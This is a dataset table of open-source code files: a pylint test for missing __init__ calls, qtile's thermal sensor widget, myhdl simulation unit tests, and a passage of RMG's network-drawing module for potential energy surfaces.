repo_name (string, lengths 5-100) | path (string, lengths 4-299) | copies (string, 990 classes) | size (string, lengths 4-7) | content (string, lengths 666-1.03M) | license (string, 15 classes) | hash (int64, -9,223,351,895,964,839,000 to 9,223,297,778B) | line_mean (float64, 3.17-100) | line_max (int64, 7-1k) | alpha_frac (float64, 0.25-0.98) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|
axbaretto/beam | sdks/python/.tox/lint/lib/python2.7/site-packages/pylint/test/functional/init_not_called.py | 7 | 1443 | # pylint: disable=R0903,import-error,missing-docstring,wrong-import-position
"""test for __init__ not called
"""
from __future__ import print_function
class AAAA: # <3.0:[old-style-class]
"""ancestor 1"""
def __init__(self):
print('init', self)
class BBBB: # <3.0:[old-style-class]
"""ancestor 2"""
def __init__(self):
print('init', self)
class CCCC: # <3.0:[old-style-class,no-init]
"""ancestor 3"""
class ZZZZ(AAAA, BBBB, CCCC):
"""derived class"""
def __init__(self): # [super-init-not-called]
AAAA.__init__(self)
class NewStyleA(object):
"""new style class"""
def __init__(self):
super(NewStyleA, self).__init__()
print('init', self)
class NewStyleB(NewStyleA):
"""derived new style class"""
def __init__(self):
super(NewStyleB, self).__init__()
class NoInit(object):
"""No __init__ defined"""
class Init(NoInit):
"""Don't complain for not calling the super __init__"""
def __init__(self, arg):
self.arg = arg
class NewStyleC(object):
"""__init__ defined by assignemnt."""
def xx_init(self):
"""Initializer."""
pass
__init__ = xx_init
class AssignedInit(NewStyleC):
"""No init called."""
def __init__(self): # [super-init-not-called]
self.arg = 0
from missing import Missing
class UnknownBases(Missing):
"""Don't emit no-init if the bases aren't known."""
| apache-2.0 | -5,226,937,147,729,600,000 | 21.546875 | 76 | 0.581428 | false |
kopchik/qtile | libqtile/widget/sensors.py | 7 | 4737 | # -*- coding:utf-8 -*-
# Copyright (c) 2012 TiN
# Copyright (c) 2012, 2014 Tycho Andersen
# Copyright (c) 2013 Tao Sauvage
# Copyright (c) 2014-2015 Sean Vig
# Copyright (c) 2014 Adi Sieker
# Copyright (c) 2014 Foster McLane
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# coding: utf-8
import re
from six import u, PY2
from . import base
from ..utils import UnixCommandNotFound, catch_exception_and_warn
class ThermalSensor(base.InLoopPollText):
'''
    To use the thermal sensor widget you need to have lm-sensors installed.
    You can get a list of the tag_sensors by executing "sensors" in your
    terminal. Then you can choose the one you want; otherwise the first
    available sensor is displayed.
'''
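    # A minimal usage sketch, assuming a qtile bar config (values are
    # illustrative, not defaults enforced by this module):
    #   widget.ThermalSensor(tag_sensor="Core 0", threshold=75)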
orientations = base.ORIENTATION_HORIZONTAL
defaults = [
('metric', True, 'True to use metric/C, False to use imperial/F'),
('show_tag', False, 'Show tag sensor'),
('update_interval', 2, 'Update interval in seconds'),
('tag_sensor', None,
'Tag of the temperature sensor. For example: "temp1" or "Core 0"'),
(
'threshold',
70,
'If the current temperature value is above, '
'then change to foreground_alert colour'
),
('foreground_alert', 'ff0000', 'Foreground colour alert'),
]
def __init__(self, **config):
base.InLoopPollText.__init__(self, **config)
self.add_defaults(ThermalSensor.defaults)
self.sensors_temp = re.compile(
u(r"""
([\w ]+): # Sensor tag name
\s+[+|-] # temp signed
(\d+\.\d+) # temp value
({degrees} # ° match
[C|F]) # Celsius or Fahrenheit
""".format(degrees="\xc2\xb0" if PY2 else "\xb0")),
re.UNICODE | re.VERBOSE
)
self.value_temp = re.compile("\d+\.\d+")
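        # Illustrative `sensors` output line the patterns above are meant to
        # parse (example reading, not taken from a real run):
        #   Core 0:       +45.0°C  (high = +84.0°C, crit = +100.0°C)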
temp_values = self.get_temp_sensors()
self.foreground_normal = self.foreground
if temp_values is None:
self.data = "sensors command not found"
elif len(temp_values) == 0:
self.data = "Temperature sensors not found"
elif self.tag_sensor is None:
for k in temp_values:
self.tag_sensor = k
break
@catch_exception_and_warn(warning=UnixCommandNotFound, excepts=OSError)
def get_temp_sensors(self):
"""calls the unix `sensors` command with `-f` flag if user has specified that
the output should be read in Fahrenheit.
"""
command = ["sensors", ]
if not self.metric:
command.append("-f")
sensors_out = self.call_process(command)
return self._format_sensors_output(sensors_out)
def _format_sensors_output(self, sensors_out):
"""formats output of unix `sensors` command into a dict of
{<sensor_name>: (<temperature>, <temperature symbol>), ..etc..}
"""
temperature_values = {}
for name, temp, symbol in self.sensors_temp.findall(sensors_out):
name = name.strip()
temperature_values[name] = temp, symbol
return temperature_values
def poll(self):
temp_values = self.get_temp_sensors()
if temp_values is None:
return False
text = ""
if self.show_tag and self.tag_sensor is not None:
text = self.tag_sensor + ": "
text += "".join(temp_values.get(self.tag_sensor, ['N/A']))
temp_value = float(temp_values.get(self.tag_sensor, [0])[0])
if temp_value > self.threshold:
self.layout.colour = self.foreground_alert
else:
self.layout.colour = self.foreground_normal
return text
| mit | -4,162,040,955,152,966,700 | 38.466667 | 85 | 0.627534 | false |
jck/myhdl | myhdl/test/core/test_Simulation.py | 4 | 24746 | # This file is part of the myhdl library, a Python package for using
# Python as a Hardware Description Language.
#
# Copyright (C) 2003-2008 Jan Decaluwe
#
# The myhdl library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation; either version 2.1 of the
# License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
""" Run unit tests for Simulation """
import random
from random import randrange
from unittest import TestCase
from myhdl import (Signal, Simulation, SimulationError, StopSimulation, delay,
intbv, join, now)
from myhdl._Simulation import _error
from helpers import raises_kind
random.seed(1) # random, but deterministic
QUIET=1
class Shared:
pass
class SimArgs(TestCase):
""" Simulation arguments """
def test1(self):
with raises_kind(SimulationError, _error.ArgType):
Simulation(None)
def test2(self):
def g():
yield delay(10)
i = g()
with raises_kind(SimulationError, _error.DuplicatedArg):
Simulation(i, i)
class YieldNone(TestCase):
""" Basic test of yield None behavior """
def test1(self):
def stimulus():
a = Signal(0)
yield delay(10)
a.next = 1
yield None
assert a.val == 0
assert now() == 10
yield delay(0)
assert a.val == 1
assert now() == 10
Simulation(stimulus()).run(quiet=QUIET)
def test2(self):
def stimulus():
a = Signal(0)
yield delay(10)
a.next = 1
assert a.val == 0
assert now() == 10
yield None
a.next = 0
assert a.val == 0
assert now() == 10
yield None
a.next = 1
assert a.val == 0
assert now() == 10
yield delay(0)
assert a.val == 1
assert now() == 10
Simulation(stimulus()).run(quiet=QUIET)
def test3(self):
def stimulus():
a = Signal(0)
yield delay(10)
a.next = 1
yield None, delay(10)
assert a.val == 0
assert now() == 10
yield delay(0)
assert a.val == 1
assert now() == 10
Simulation(stimulus()).run(quiet=QUIET)
def test4(self):
def stimulus():
a = Signal(0)
yield delay(10)
def gen():
yield delay(20)
a.next = 1
yield None, gen()
assert a.val == 0
assert now() == 10
yield delay(25)
assert a.val == 1
Simulation(stimulus()).run(quiet=QUIET)
class JoinMix(TestCase):
""" Test of joins mixed with other clauses """
def test1(self):
def stimulus():
a = Signal(0)
def gen():
yield join(delay(10), delay(20))
yield gen(), delay(5)
assert now() == 5
yield a
raise AssertionError("Incorrect run") # should not get here
Simulation(stimulus()).run(quiet=QUIET)
def test2(self):
def stimulus():
a = Signal(0)
yield join(delay(10), delay(20)), delay(5)
assert now() == 5
yield a
raise AssertionError("Incorrect run") # should not get here
Simulation(stimulus()).run(quiet=QUIET)
def stimulus(self, a, b, c, d):
yield delay(5)
a.next = 1
yield delay(5)
a.next = 0
b.next = 1
yield delay(5)
a.next = 1
b.next = 0
c.next = 1
yield delay(5)
a.next = 0
b.next = 1
c.next = 0
d.next = 1
def test3(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a, b, c, d)
assert now() == 20
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
def test4(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a, b), join(c, d)
assert now() == 10
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
def test5(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a), b, join(c, d)
assert now() == 5
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
def test6(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a, delay(20)), b, join(c, d)
assert now() == 10
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
def test7(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a, delay(30)), join(c, d)
assert now() == 20
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
def test8(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a, a.negedge)
assert now() == 10
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
def test9(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a, a.negedge, c.posedge)
assert now() == 15
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
def test10(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a, a)
assert now() == 5
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
def test11(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a, b.posedge, b.negedge, a)
assert now() == 15
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
class JoinedGen(TestCase):
""" Basic test of yielding joined concurrent generators """
def bench(self):
clk = Signal(0)
sig1 = Signal(0)
sig2 = Signal(0)
td = 10
def gen(s, n):
for i in range(n-1):
yield delay(td)
s.next = 1
yield delay(td)
for i in range(10):
offset = now()
n0 = randrange(1, 50)
n1 = randrange(1, 50)
n2 = randrange(1, 50)
sig1.next = 0
sig2.next = 0
yield join(delay(n0*td), gen(sig1, n1), gen(sig2, n2))
assert sig1.val == 1
assert sig2.val == 1
assert now() == offset + td * max(n0, n1, n2)
raise StopSimulation("Joined concurrent generator yield")
def testYieldJoinedGen(self):
Simulation(self.bench()).run(quiet=QUIET)
class SignalUpdateFirst(TestCase):
""" Check that signal updates are done first, as in VHDL """
def bench(self):
Q = Signal(0, delay=9)
R = Signal(0, delay=10)
S = Signal(0, delay=11)
def process():
Q.next = 0
R.next = 0
S.next = 0
yield delay(50)
Q.next = 1
R.next = 1
S.next = 1
yield delay(10)
assert Q.val == 1 # control
assert R.val == 1 # actual check
assert S.val == 0 # control
yield delay(1)
assert Q.val == 1 # control
assert R.val == 1 # control
assert S.val == 1 # control
raise StopSimulation("Signal update test")
return process()
def testSignalUpdateFirst(self):
Simulation(self.bench()).run(quiet=QUIET)
class YieldZeroDelay(TestCase):
""" Basic test of yielding a zero delay """
def bench(self):
clk = Signal(0)
sig1 = Signal(0)
sig2 = Signal(0)
td = 10
def gen(s, n):
s.next = 0
for i in range(n):
yield delay(td)
s.next = 1
for i in range(100):
offset = now()
n1 = randrange(2, 10)
n2 = randrange(n1+1, 20) # n2 > n1
yield delay(0), gen(sig1, n1), gen(sig2, n2)
assert sig1.val == 0
assert sig2.val == 0
assert now() == offset + 0
yield sig1.posedge
assert sig2.val == 0
assert now() == offset + n1*td
yield sig2.posedge
assert now() == offset + n2*td
raise StopSimulation("Zero delay yield")
def testYieldZeroDelay(self):
Simulation(self.bench()).run(quiet=QUIET)
class YieldConcurrentGen(TestCase):
""" Basic test of yielding concurrent generators """
def bench(self):
clk = Signal(0)
sig1 = Signal(0)
sig2 = Signal(0)
td = 10
def gen(s, n):
s.next = 0
for i in range(n):
yield delay(td)
s.next = 1
for i in range(100):
offset = now()
n1 = randrange(2, 10)
n2 = randrange(n1+1, 20) # n2 > n1
yield delay(td), gen(sig1, n1), gen(sig2, n2)
assert sig1.val == 0
assert sig2.val == 0
assert now() == offset + td
yield sig1.posedge
assert sig2.val == 0
assert now() == offset + n1*td
yield sig2.posedge
assert now() == offset + n2*td
raise StopSimulation("Concurrent generator yield")
def testYieldConcurrentGen(self):
Simulation(self.bench()).run(quiet=QUIET)
class YieldGen(TestCase):
""" Basic test of yielding generators """
def bench(self):
clk = Signal(0)
shared = Shared()
shared.cnt = 0
shared.i = 0
expected = []
nlists = []
expectedCnt = 0
for i in range(300):
l = []
for j in range(randrange(1, 6)):
e = randrange(0, 5)
l.append(e)
expectedCnt += e
expected.append(expectedCnt)
nlists.append(l)
def clkGen():
while 1:
yield delay(10)
clk.next = 1
yield delay(10)
clk.next = 0
def task(nlist):
n = nlist.pop(0)
for i in range(n):
yield clk.posedge
shared.cnt += 1
assert shared.cnt == expected[shared.i]
shared.i += 1
if nlist:
yield task(nlist)
def module():
for nlist in nlists:
yield task(nlist)
assert shared.cnt == expected[-1]
raise StopSimulation("Generator yield")
return(module(), clkGen())
def testYieldGen(self):
Simulation(self.bench()).run(quiet=QUIET)
class DeltaCycleOrder(TestCase):
""" Check that delta cycle order does not matter """
def bench(self, function):
clk = Signal(0)
a = Signal(0)
b = Signal(0)
c = Signal(0)
d = Signal(0)
z = Signal(0)
delta = [Signal(0) for i in range(4)]
inputs = Signal(intbv(0))
s = [a, b, c, d]
vectors = [intbv(j) for i in range(8) for j in range(16)]
random.shuffle(vectors)
index = list(range(4))
def clkGen():
while 1:
yield delay(10)
clk.next ^= 1
def deltaGen():
while 1:
yield clk
delta[0].next = clk.val
yield delta[0]
for i in range(1, 4):
delta[i].next = delta[i-1].val
yield delta[i]
def inGen(i):
while 1:
yield delta[i].posedge
s[index[i]].next = inputs.val[index[i]]
def logic():
while 1:
# yield a, b, c, d
z.next = function(a.val, b.val, c.val, d.val)
yield a, b, c, d
def stimulus():
for v in vectors:
inputs.next = v
random.shuffle(index)
yield clk.posedge
yield clk.posedge
assert z.val == function(v[0], v[1], v[2], v[3])
raise StopSimulation("Delta cycle order")
inputGen = [inGen(i) for i in range(4)]
instance = [clkGen(), deltaGen(), logic(), stimulus(), inputGen]
return instance
def testAnd(self):
def andFunction(a, b, c, d):
return a & b & c & d
Simulation(self.bench(andFunction)).run(quiet=QUIET)
def testOr(self):
def orFunction(a, b, c, d):
return a | b | c | d
Simulation(self.bench(orFunction)).run(quiet=QUIET)
def testXor(self):
def xorFunction(a, b, c, d):
return a ^ b ^ c ^ d
Simulation(self.bench(xorFunction)).run(quiet=QUIET)
def testMux(self):
def muxFunction(a, b, c, d):
if c:
return a
else:
return b
Simulation(self.bench(muxFunction)).run(quiet=QUIET)
def testLogic(self):
def function(a, b, c, d):
return not (a & (not b)) | ((not c) & d)
Simulation(self.bench(function)).run(quiet=QUIET)
class DeltaCycleRace(TestCase):
""" Check that delta cycle races are like in VHDL """
def bench(self):
uprange = range(300)
msig = Signal(uprange[0])
ssig = [Signal(uprange[-1]) for i in range(2)]
dsig = [Signal(uprange[0]) for i in range(2)]
clk = Signal(0)
deltaClk = Signal(0)
shared = Shared()
shared.t = now()
def clkGen():
for i in uprange[:-1]:
yield delay(10)
clk.next = 1
yield delay(10)
clk.next = 0
def deltaClkGen():
while 1:
yield clk
deltaClk.next = clk.val
def master():
i = 0
while 1:
yield clk.posedge
msig.next = uprange[i+1]
assert msig.val == uprange[i]
shared.t = now()
i += 1
def slave(ssig):
""" Double-check proper operation """
i = 0
while 1:
yield clk.posedge
ssig.next = msig.val
assert ssig.val == uprange[i-1]
i += 1
def deltaSlave(dsig):
""" Expect delta cycle races """
i = 0
while 1:
yield deltaClk.posedge
dsig.next = msig.val
assert now() == shared.t
assert dsig.val == uprange[i]
i += 1
return (slave(ssig[1]), deltaSlave(dsig[1]),
master(), clkGen(), deltaClkGen(),
slave(ssig[0]), deltaSlave(dsig[0]))
def testDeltaCycleRace(self):
""" Check delta cycle races """
bench = self.bench()
Simulation(bench).run(quiet=QUIET)
class DelayLine(TestCase):
""" Check that delay lines work properly """
def bench(self):
uprange = range(500)
sig_Z = [Signal(uprange[-i]) for i in range(7)]
clk = Signal(0)
def clkGen():
for i in uprange[:-1]:
yield delay(10)
clk.next = 1
yield delay(10)
clk.next = 0
def delayElement(n, i):
sig_Z[n].next = sig_Z[n-1].val
assert sig_Z[n].val == uprange[i-n]
def stage(n):
i = 0
while 1:
yield clk.posedge
delayElement(n, i)
i += 1
def stage012():
i = 0
while 1:
yield clk.posedge
delayElement(1, i)
sig_Z[0].next = uprange[i+1]
delayElement(2, i)
i += 1
return [stage(6), stage(4), clkGen(), stage(3), stage012(), stage(5)]
def testZeroDelay(self):
""" Zero delay behavior """
bench = self.bench()
Simulation(bench).run(quiet=QUIET)
def initSignal(waveform):
interval, val, sigdelay = waveform[0]
if sigdelay:
return Signal(val=val, delay=sigdelay)
else:
return Signal(val=val)
def isPosedge(oldval, val):
return not oldval and val
def isNegedge(oldval, val):
return oldval and not val
def isEvent(oldval, val):
return oldval != val
def isEdge(oldval, val):
return isPosedge(oldval, val) or isNegedge(oldval, val)
def getExpectedTimes(waveform, eventCheck):
interval, val, sigdelay = waveform[0]
# print waveform[0]
expected = []
time = interval
oldval = val
i = 1
while i < len(waveform):
interval, val, sigdelay = waveform[i]
# print waveform[i]
time += interval
# check future events within inertial delay interval
j = i+1
inctime = 0
while j < len(waveform) and inctime + waveform[j][0] < sigdelay:
inctime += waveform[j][0]
newval = waveform[j][1]
newsigdelay = waveform[j][2]
if newval != val: # cancel event
break
else: # same vals
if inctime + newsigdelay < sigdelay:
# special case: there is a later event, with same val,
# but smaller delay: presumably, this should win,
# so cancel the present one
break
j += 1
else: # if event was not cancelled by a break
if eventCheck(oldval, val):
expected.append(time + sigdelay)
# print expected[-1]
oldval = val
i += 1
# print expected
return expected
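# A worked example of the inertial-delay bookkeeping above (illustrative
# numbers, not taken from the generated waveforms): with sigdelay=10, a value
# scheduled at t=100 only ends up in `expected` if no conflicting value is
# scheduled before t=110; otherwise the earlier transition is cancelled,
# mirroring VHDL-style inertial delay.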
class Waveform(TestCase):
""" Test of all sorts of event response in a waveform """
waveform = []
duration = 0
sigdelay = 0
for i in range(2000):
interval = randrange(0, 150)
val = randrange(0, 4)
waveform.append((interval, val, sigdelay))
duration = interval + duration
def stimulus(self):
for interval, val, sigdelay in self.waveform:
yield delay(interval)
self.sig.next = val
if sigdelay:
self.sig.delay = sigdelay
def response(self, clause, expected):
assert len(expected) > 100 # we should test something
i = 0
while 1:
yield clause
assert now() == expected[i]
i += 1
def setUp(self):
self.sig = initSignal(self.waveform)
def runSim(self, sim):
sim.run(quiet=QUIET)
def testPosedge(self):
""" Posedge waveform test """
s = self.sig
stimulus = self.stimulus()
expected = getExpectedTimes(self.waveform, isPosedge)
response = self.response(clause=s.posedge, expected=expected)
self.runSim(Simulation(stimulus, response))
assert self.duration <= now()
def testNegedge(self):
""" Negedge waveform test """
s = self.sig
stimulus = self.stimulus()
expected = getExpectedTimes(self.waveform, isNegedge)
response = self.response(clause=s.negedge, expected=expected)
self.runSim(Simulation(stimulus, response))
assert self.duration <= now()
def testEdge(self):
""" Edge waveform test """
s = self.sig
stimulus = self.stimulus()
expected = getExpectedTimes(self.waveform, isEdge)
response = self.response(clause=(s.negedge, s.posedge),
expected=expected)
self.runSim(Simulation(stimulus, response))
assert self.duration <= now()
def testEvent(self):
""" Event waveform test """
s = self.sig
stimulus = self.stimulus()
expected = getExpectedTimes(self.waveform, isEvent)
# print expected
response = self.response(clause=s, expected=expected)
self.runSim(Simulation(stimulus, response))
assert self.duration <= now()
def testRedundantEvents(self):
""" Redundant event waveform test """
s = self.sig
stimulus = self.stimulus()
expected = getExpectedTimes(self.waveform, isEvent)
response = self.response(clause=(s,) * 6, expected=expected)
self.runSim(Simulation(stimulus, response))
assert self.duration <= now()
def testRedundantEventAndEdges(self):
""" Redundant edge waveform test """
s = self.sig
stimulus = self.stimulus()
expected = getExpectedTimes(self.waveform, isEvent)
response = self.response(clause=(s, s.negedge, s.posedge),
expected=expected)
self.runSim(Simulation(stimulus, response))
assert self.duration <= now()
def testRedundantPosedges(self):
""" Redundant posedge waveform test """
s = self.sig
stimulus = self.stimulus()
expected = getExpectedTimes(self.waveform, isPosedge)
response = self.response(clause=(s.posedge,) * 3, expected=expected)
self.runSim(Simulation(stimulus, response))
assert self.duration <= now()
def testRedundantNegedges(self):
""" Redundant negedge waveform test """
s = self.sig
stimulus = self.stimulus()
expected = getExpectedTimes(self.waveform, isNegedge)
response = self.response(clause=(s.negedge,) * 9, expected=expected)
self.runSim(Simulation(stimulus, response))
assert self.duration <= now()
class WaveformSigDelay(Waveform):
""" Repeat waveform tests with a delayed signal """
waveform = []
duration = 0
sigdelay = 0
for i in range(2000):
interval = randrange(20, 150)
val = randrange(0, 4)
sigdelay = randrange(1, 20)
waveform.append((interval, val, sigdelay))
duration += interval
class WaveformInertialDelay(Waveform):
""" Repeat waveform tests to check inertial delay """
waveform = []
duration = 0
sigdelay = 0
for i in range(2000):
interval = randrange(3, 10)
val = randrange(0, 3)
sigdelay = randrange(1, 5)
waveform.append((interval, val, sigdelay))
duration += interval
class WaveformInertialDelayStress(Waveform):
""" Repeat waveform tests to stress inertial delay """
waveform = []
duration = 0
sigdelay = 0
for i in range(2000):
interval = randrange(1, 3)
val = randrange(0, 3)
sigdelay = randrange(1, 3)
waveform.append((interval, val, sigdelay))
duration += interval
class SimulationRunMethod(Waveform):
""" Basic test of run method of Simulation object """
def runSim(self, sim):
duration = randrange(1, 300)
while sim.run(duration, quiet=QUIET):
duration = randrange(1, 300)
class TimeZeroEvents(TestCase):
""" Check events at time 0 """
def bench(self, sig, next, clause, timeout=1):
val = sig.val
def stimulus():
sig.next = next
yield delay(10)
def response():
yield clause, delay(timeout)
assert now() == 0
assert sig.val == next
return [stimulus(), response()]
def testEvent(self):
""" Event at time 0 """
s = Signal(0)
testBench = self.bench(sig=s, next=1, clause=s)
Simulation(testBench).run(quiet=QUIET)
def testPosedge(self):
""" Posedge at time 0 """
s = Signal(0)
testBench = self.bench(sig=s, next=1, clause=s.posedge)
Simulation(testBench).run(quiet=QUIET)
def testNegedge(self):
""" Negedge at time 0 """
s = Signal(1)
testBench = self.bench(sig=s, next=0, clause=s.negedge)
Simulation(testBench).run(quiet=QUIET)
| lgpl-2.1 | -7,527,635,209,544,915,000 | 27.18451 | 78 | 0.520286 | false |
Molecular-Image-Recognition/Molecular-Image-Recognition | code/rmgpy/pdep/draw.py | 2 | 19054 | #!/usr/bin/env python
# encoding: utf-8
################################################################################
#
# RMG - Reaction Mechanism Generator
#
# Copyright (c) 2002-2017 Prof. William H. Green ([email protected]),
# Prof. Richard H. West ([email protected]) and the RMG Team ([email protected])
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the 'Software'),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
################################################################################
"""
This module contains the :class:`NetworkDrawer` class, used to generate a
depiction of a pressure-dependent reaction network.
"""
import numpy
import logging
from rmgpy.molecule.draw import MoleculeDrawer, createNewSurface
################################################################################
class NetworkDrawer:
"""
This class provides functionality for drawing the potential energy surface
for a pressure-dependent reaction network using the Cairo 2D graphics
engine. The most common use case is simply::
NetworkDrawer().draw(network, format='png', path='network.png')
where ``network`` is the :class:`Network` object to draw. You can also
pass a dict of options to the constructor to affect how the network is
drawn.
"""
def __init__(self, options=None):
self.options = {
'structures': True,
'fontFamily': 'sans',
'fontSizeNormal': 12,
'Eunits': 'kJ/mol',
'padding': 16,
'wellWidth': 64,
'wellSpacing': 64,
'Eslope': 1.5,
'TSwidth': 16,
'E0offset': 0.0,
}
if options: self.options.update(options)
self.clear()
def clear(self):
self.network = None
self.left = 0.0
self.top = 0.0
self.right = 0.0
self.bottom = 0.0
self.surface = None
self.cr = None
def __getEnergyRange(self):
"""
Return the minimum and maximum energy in J/mol on the potential energy
surface.
"""
E0min = self.network.isomers[0].E0
E0max = E0min
for isomer in self.network.isomers[1:]:
E0 = isomer.E0
if E0 < E0min: E0min = E0
if E0 > E0max: E0max = E0
for reactant in self.network.reactants:
E0 = reactant.E0
if E0 < E0min: E0min = E0
if E0 > E0max: E0max = E0
for product in self.network.products:
E0 = product.E0
if E0 < E0min: E0min = E0
if E0 > E0max: E0max = E0
for rxn in self.network.pathReactions:
E0 = rxn.transitionState.conformer.E0.value_si
if E0 < E0min: E0min = E0
if E0 > E0max: E0max = E0
return E0min, E0max
def __useStructureForLabel(self, configuration):
"""
Return ``True`` if the configuration should use molecular structures
for its labels or ``False`` otherwise.
"""
# Initialize with the current user option value
useStructures = self.options['structures']
# But don't use structures if one or more species in the configuration
# do not have structure data
for spec in configuration.species:
if spec.molecule is None or len(spec.molecule) == 0:
useStructures = False
break
return useStructures
def __getTextSize(self, text, padding=2, format='pdf'):
"""
"""
try:
import cairocffi as cairo
except ImportError:
import cairo
# Use dummy surface to determine text extents
surface = createNewSurface(format)
cr = cairo.Context(surface)
cr.set_font_size(self.options['fontSizeNormal'])
extents = cr.text_extents(text)
width = extents[2] + 2 * padding
height = extents[3] + 2 * padding
return [0, 0, width, height]
def __drawText(self, text, cr, x0, y0, padding=2):
"""
"""
cr.save()
cr.set_font_size(self.options['fontSizeNormal'])
extents = cr.text_extents(text)
cr.move_to(x0 - extents[0] - padding, y0 - extents[1] + padding)
cr.set_source_rgba(0.0, 0.0, 0.0, 1.0)
cr.show_text(text)
cr.restore()
width = extents[2] + 2 * padding
height = extents[3] + 2 * padding
return [0, 0, width, height]
def __getLabelSize(self, configuration, format='pdf'):
"""
"""
width = 0; height = 0; boundingRects = []
if self.__useStructureForLabel(configuration):
for spec in configuration.species:
surface, cr, rect = MoleculeDrawer().draw(spec.molecule[0], format=format)
boundingRects.append(list(rect))
else:
for spec in configuration.species:
boundingRects.append(self.__getTextSize(spec.label, format=format))
plusRect = self.__getTextSize('+', format=format)
for rect in boundingRects:
if width < rect[2]: width = rect[2]
height += rect[3] + plusRect[3]
height -= plusRect[3]
return [0, 0, width, height]
def __drawLabel(self, configuration, cr, x0, y0, format='pdf'):
boundingRect = self.__getLabelSize(configuration, format=format)
padding = 2
useStructures = self.__useStructureForLabel(configuration)
y = y0
for i, spec in enumerate(configuration.species):
if i > 0:
rect = self.__getTextSize('+', padding=padding, format=format)
x = x0 - 0.5 * (rect[2] - boundingRect[2]) + 2 * padding
self.__drawText('+', cr, x, y)
y += rect[3]
if useStructures:
moleculeDrawer = MoleculeDrawer()
cr.save()
surf, c, rect = moleculeDrawer.draw(spec.molecule[0], format=format)
cr.restore()
x = x0 - 0.5 * (rect[2] - boundingRect[2])
cr.save()
moleculeDrawer.render(cr, offset=(x, y))
cr.restore()
y += rect[3]
else:
rect = self.__getTextSize(spec.label, padding=padding, format=format)
x = x0 - 0.5 * (rect[2] - boundingRect[2]) + 2 * padding
self.__drawText(spec.label, cr, x, y)
y += rect[3]
return boundingRect
def draw(self, network, format, path=None):
"""
Draw the potential energy surface for the given `network` as a Cairo
surface of the given `format`. If `path` is given, the surface is
saved to that location on disk.
"""
try:
import cairocffi as cairo
except ImportError:
try:
import cairo
except ImportError:
logging.warning('Cairo not found; potential energy surface will not be drawn.')
return
self.network = network
# The order of wells is as follows:
# - Reactant channels come first (to the left)
# - Isomers are in the middle
# - Product channels come last (to the right)
# This is done because most people will read the PES from left to right
wells = []
wells.extend(network.reactants)
wells.extend(network.isomers)
wells.extend(network.products)
# Generate the bounding rectangles for each configuration label
labelRects = []
for well in wells:
labelRects.append(self.__getLabelSize(well, format=format))
# Get energy range (use kJ/mol internally)
E0min, E0max = self.__getEnergyRange()
E0min *= 0.001; E0max *= 0.001
# Drawing parameters
padding = self.options['padding']
wellWidth = self.options['wellWidth']
wellSpacing = self.options['wellSpacing']
Eslope = self.options['Eslope']
TSwidth = self.options['TSwidth']
E0_offset = self.options['E0offset'] * 0.001
# Choose multiplier to convert energies to desired units (on figure only)
Eunits = self.options['Eunits']
try:
